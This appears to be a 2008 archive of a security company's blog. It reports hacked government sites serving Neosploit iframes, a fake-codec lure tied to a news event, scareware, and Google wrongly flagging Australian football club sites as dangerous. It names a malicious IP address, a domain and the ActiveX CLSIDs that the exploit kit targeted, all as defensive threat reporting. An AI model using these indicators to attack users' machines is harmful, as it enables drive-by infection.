Monday, February 25, 2008

google defames saints ... bolts of lightning fall

I'm kidding, I'm kidding!!!!!!!

Update number 2: Feb 26, 2008, 6:30am est

Dang, that was quick. Some of the sites, such as St Kilda, and the Geelong Cats sites, are now correctly marked as clean. They're not all correct though ... the Brisbane Lions site is still incorrectly marked as dangerous, for example, but that was still quick for the others, and we hope that all will shortly be corrected. Shout-outs to google for reacting quickly!

Update number 1:

Some of our team in the Australian office noticed that it wasn't just the Saints, but also the Victorian based clubs of North Melbourne Kangaroos, Carlton Blues, Geelong Cats, Hawthorn Hawks, Melbourne Demons and Richmond Tigers, plus Port Adelaide Power (South Australia), Sydney Swans (New South Wales) and Brisbane Lions (Queensland) all being blocked by Google the same way. Shout-outs to the guys down-unda!

-----------------------------------------------------------------

Hi folks,

What I'm really talking about is that if you search for "saints football club", the number 3 organic search result is the famous (to Australians) St Kilda Football club. The "defamation" bit is that google has one of its "This site may harm your computer" messages against it.



(If you look at the screen snapshot, you'll notice that LinkScanner assesses the site to be clean... the correct result)

This means that it is not possible for anyone to click thru a google search and get to the St Kilda website... you have to deliberately cut and paste the url back into your browser bar.

The reason that they're doing it is that, probably, at some point the website was hacked, and was infecting people, but ....GOOGLE-GUYS!!! IT'S CLEAN NOW!!! TAKE THE BLOCK OFF, PLEASE!!! (I feel like saying "Mr Google! Tear down this wall!", but I wouldn't be so bold.)

What this really underscores is the concept that a centralized database is useless at detecting web issues... the problem is simply too transient.

This happens quite a bit, and I must admit that I'm surprised that no one has accused google of damaging their brand. I'm sure regular readers of my blog will remember the case of k1-usa.net. They used to be the number one organic result when people searched for k1. They were hacked for about 10 days, and then cleaned, but in the mean time, they had earned the "This site maye harm your computer label", and over the next 12 months, before the label was removed, their rating slipped, and slipped, until finally it was nowhere on the first three pages.

I can't imagine St Kilda taking it lying down if their ratings start to slip, and I can't imagine google meaning that to happen. It just shows how difficult it is to keep up.

Cheers


Roger

Labels:

Friday, February 22, 2008

Another gov site hacked

Hi folks,

Who can see what's wrong with this picture?



Looks pretty reasonable, doesn't it? Here's what you see if you have a suitable monitoring tool...



Enquiring Minds will wonder why a county government site is reaching out to pepato.org.

And here's what you see on a vulnerable pc, _if_ you're running another suitable monitoring tool...



And here's the offending code in the page source ...



Yes, it's hacked. Bit hard to tell without some tools, though, eh? We've told the county, so we expect it'll get cleaned up very quickly, but be careful in the mean time.

Cheers

Roger

Labels:

Thursday, February 21, 2008

This is kind of funny

Hi folks,

We've been following up on the new Neosploit that we reported last night. This was actually a pretty high-profile site, so we wanted to notify them. We couldn't find a contact point on the hacked domain, but we found another subdomain that had an online support chat option, and we gave it a try. The conversation was sufficiently funny that we grabbed a screen capture (anonymized to protect the innocent). You might have to double-click it to read it, but it's worthwhile...




:-)

Fwiw, we eventually found someone who understood, and we got it cleaned up.

Cheers

Roger

Labels:

Wednesday, February 20, 2008

New Neo Now

(Sorry... the alliteration bug bit me)

Hi folks,

Last night, as the title suggests, we found a new version of Neosploit. It has two new exploits, one uses a clsid of EEE78591-FE22-11D0-8BEF-0060081841DE, which appears to be the ActiveVoice ActiveX dll from Microsoft, and the other clsid is 5F810AFC-BB5F-4416-BE63-E01DD117BD6C, which is the Music Jukebox control from Yahoo.

The most recent ActiveVoice exploit seems to be from about June 2007, but the most recent JukeBox exploit is from Feb 2008, so that's kind of interesting.

We'll try to figure out over the next couple of days if these are the ones that indeed match up, but the bottom line is that the Neosploit developers are very active.

Cheers

Roger

Labels:

Saturday, February 16, 2008

Wow... this was quick

Hi folks,

I'm sure most people know about the horrific attack on the poor NYC psych. In the news tonight, we noticed that the police had arrested someone named David Tarloff for allegedly being the perp. With the web being what it is, we often find that if you look quickly, you can find personal pages about these people, often before the police get them taken down. Ok, it's a little morbid, but it's interesting at the same time.

So, when we googled for David Tarloff, here was the result...



Hmmm... an AOL journal account... that sounds plausible for a personal page... click...



Yep ... still looks plausible ... let's click the name ... click...



WAAAAIT A MINUTE!!!!! That ain't no Hank William's song! (Pop culture reference to Bob, of Bob's Country Bunker in the Blues Brothers, where Bob suddenly realizes that that the boys aren't really a country and western band, and that he's been had.)

Attentive readers will instantly notice that this is a Fake Codec, and will close the browser. Non-attentive readers will attempt to install the codec, and will be rewarded with a rootkit.

But how quick was that? We only noticed that the guy had been arrested and named today, and yet they not only managed to get their lure in place on AOL, but they also managed to get their site the Number One organic result on Google if you search for David Tarloff! And on the weekend at that! These boys are on the ball. We're grudgingly impressed.

Be careful folks, it's a tricky world out there.

Cheers

Roger

Labels:

Thursday, February 07, 2008

MalwareAlarm

Hi folks,

MalwareAlarm is so common now, we decided to give it it's own vid. Remember, it's not really scanning your pc, it's just pretending to, but it does a very good job of pretending. Enjoy...



Cheers

Roger

Labels:

Wednesday, February 06, 2008

UK .gov site hacked

Note: One of our users, John Thomson (no relation as far as I know :-) ) noticed this first and brought it to our attention. His blog entry is here ...
http://www.roundtripsolutions.com/blog/2008/02/06/317/forth-road-bridge-website-hacked/

Sorry John! :-)

Hi folks,

Sometime between the 1st Feb 2008, and the 3rd of Feb 2008, the official website for the Forth Estuary Transport Authority was hacked an obfuscated iframe, using Neosploit encoding, was injected.



This decoded to an iframe that called to 88.255.90.130 (careful about going there, folks)...



This, in turn, loaded one of the current Neosploit exploit package (we have a full write-up on Neo a little further down this blog). If you're patched, or running LinkScanner, you're ok, but if not, you probably got a rootkit, so if you visited that website in the last couple of days, you might like to run an anti-root and an anti virus over your system. AVG has a free one here ... http://free.grisoft.com .

One of the most interesting aspects of this is that inside the full Neosploit download was an attempt to load bbc.com.uk , presuamably after the infection, presumably to hide what had happened a little bit. That's no big deal in itself, but a hacked uk gov website, pointing to the bbc afterwards makes us think it was not a random hack, but something more deliberate. Interesting times, folks.

Looks like they cleaned the site this morning, although the google cache is still infective, so be careful.

Cheers

Roger

Labels:

Saturday, February 02, 2008

Return of Innocent Searches

Hi folks,

I keep getting requests offline for more innocent searches, so here are some from the last couple of days. Enjoy...

coal furnace with gas insert - fake codec
road trip - neosploit
pearl shop - neosploit
high capacity battery pack - fake codec/ rootkit
eyelashes + adhesive - fake codec
camping turon gate - fake codec
greenville gremlins - fake codec
blueberry jam - mpack/ icepack
school closings in illinois parents - search engine hijack
las vegas wedding photographers - mdac
carolina theater - mpack/ icepack

Stay safe folks,

Roger

Labels: